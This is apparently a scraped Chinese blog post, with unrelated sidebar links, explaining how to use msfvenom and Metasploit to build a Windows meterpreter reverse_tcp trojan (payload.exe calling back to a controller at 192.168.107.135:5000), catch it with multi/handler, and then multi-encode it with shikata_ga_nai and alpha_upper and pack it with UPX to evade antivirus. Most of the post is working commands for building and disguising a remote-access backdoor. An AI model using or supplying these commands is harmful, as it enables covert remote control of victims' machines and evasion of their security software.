当前位置:网站首页>msfvenom制作主控与被控端
msfvenom制作主控与被控端
2022-07-28 20:05:00 【angleoldhen】
- msfconsole
- msfvenom -p windows/meterpreter/reverse_tcp lhost 192.168.107.135 lport 5000 -f exe -o /var/payload.exe
说明:-p或--payload 后面接载荷 查看msf都有哪些载荷可以通过 msfvenom -l payloads 命令
lhost 填写主控端IP lpost填写主控端端口
-f 或 --format 接输出文件的格式
-o 或 --out 指定文件存放路径
--payload-options //列举payload的标准参数项
--help-formats //列举msf支持的输出文件格式

关于msfvenom更详细参数使用可以参看:Metasploit——msfvenom免杀木马_小白白@的博客-CSDN博客_msfvenom免杀
生成的payload.exe采用各种方法存放在被控端
在主控端msfconsole下执行
- use exploit/multi/handler
- set payload windows/meterpreter/reverse_tcp //需要与生成被控端时的payload一致
- set lhost 192.168.107.135
- set lport 5000 //这两条须与生成被控端时设置的主控端IP和端口一致
- exploit
![]()
被控端执行payload.exe后,在主控端可以看到信息:
![]()
此时主控端与被控端建立连接 。但是由于这个工具被用烂了,一般生成的被控端都会被查杀,所以通常都会对被控端进行重编码。
msf框架里的编码功能可以对被控端进行重新编码,多次编码,多种方式混合编码
执行 msfvenom -l encoder 可以查看编码器列表,excellent级的编码器效果更好
- msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.107.135 lport=5000 -e x86/nonalpha -f c
此处输出格式选C,可以在屏幕上看到编码结果,想了解多次、混合编码效果可以输出这种格式,比较low的编码出来的代码是不变的,如上例。
- msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.107.135 LPORT=5000 -e x86/shikata_ga_nai -i 10 -f raw |msfvenom -a x86 --platform Windows -e x86/alpha_upper -i 5 -f exe -o /var/payload.exe
上面的命令 -i 10 表示编码10,混合编码要写多次msfvenom用并|分隔
第二种编码不能缺--platform Windows,会执行不下去,第一种编码写不写都会报错,但是可以继续执行,原因暂不明

即使多次编码了,还是多半也被查出来,此时可以采用“加壳”的办法
upx /var/payload.exe
本文仅仅只是记录思路和命令,如上操作的被控端绝大部分还是会被查杀
边栏推荐
- 苹果M1处理器详解:性能及能效成倍提升,Intel酷睿i9也不是对手!
- Apple M1 processor details: performance and energy efficiency have doubled, and Intel Core i9 is no match!
- Information fusion method and application of expert opinion and trust in large group emergency decision-making based on complex network
- LeetCode·581.最短无序连续子数组·双指针
- Top level "redis notes", cache avalanche + breakdown + penetration + cluster + distributed lock, Nb
- The University was abandoned for three years, the senior taught himself for seven months, and found a 12K job
- Leetcode interview question 02.07. Linked list intersection [knowledge points: Double pointers, stack]
- 面向千元级5G手机市场,联发科天玑700发布
- 凡尔赛天花板:“毕业两年月薪才35K,真是没出息啊~~”
- Four methods of multi-threaded sequential operation. Ask casually during the interview
猜你喜欢

融合LSTM与逻辑回归的中文专利关键词抽取

OA项目之会议通知(查询&是否参会&反馈详情)

Achieve waterfall effect

顺序表的实现

Chinese patent keyword extraction based on LSTM and logistic regression

PyQt5快速开发与实战 5.4 网页交互

Matlab|基础知识总结一

C语言入门【详细】
![Leetcode 142. circular linked list II [knowledge points: speed pointer, hash table]](/img/74/321a4a0fab0b0dbae53b2ea1faf814.png)
Leetcode 142. circular linked list II [knowledge points: speed pointer, hash table]

Top level "redis notes", cache avalanche + breakdown + penetration + cluster + distributed lock, Nb
随机推荐
Huawei releases the first electric drive system driveone: charging for 10 minutes, endurance of 200km
Talk about row storage and column storage of database
Meeting notice of OA project (Query & whether to attend the meeting & feedback details)
Achieve waterfall effect
数据插值——对不同量级的数据进行归一化
Automatic filling of spare parts at mobile end
Apple M1 processor details: performance and energy efficiency have doubled, and Intel Core i9 is no match!
Hold high the two flags of 5g and AI: Ziguang zhanrui Market Summit is popular in Shencheng
How to skillfully use assertion + exception handling classes to make the code more concise! (glory Collection Edition)
Cy3/cy5/cy5.5/cy7 fluorescent labeling antibody / protein Kit (10~100mg labeling amount)
株洲市九方中学开展防溺水、消防安全教育培训活动
Bus, protocol, specification, interface, data acquisition and control system in industrial communication field
The 35 required questions in MySQL interview are illustrated, which is too easy to understand
Log slimming operation: how to optimize from 5g to 1g! (glory Collection Edition)
纳米金偶联抗体/蛋白试剂盒(20nm,1mg/100μg/500 μg偶联量)的制备
Pytorch学习记录(三):随机梯度下降、神经网络与全连接
PyQt5快速开发与实战 5.4 网页交互
How to measure software architecture
微信小程序开发公司你懂得选择吗?
MySQL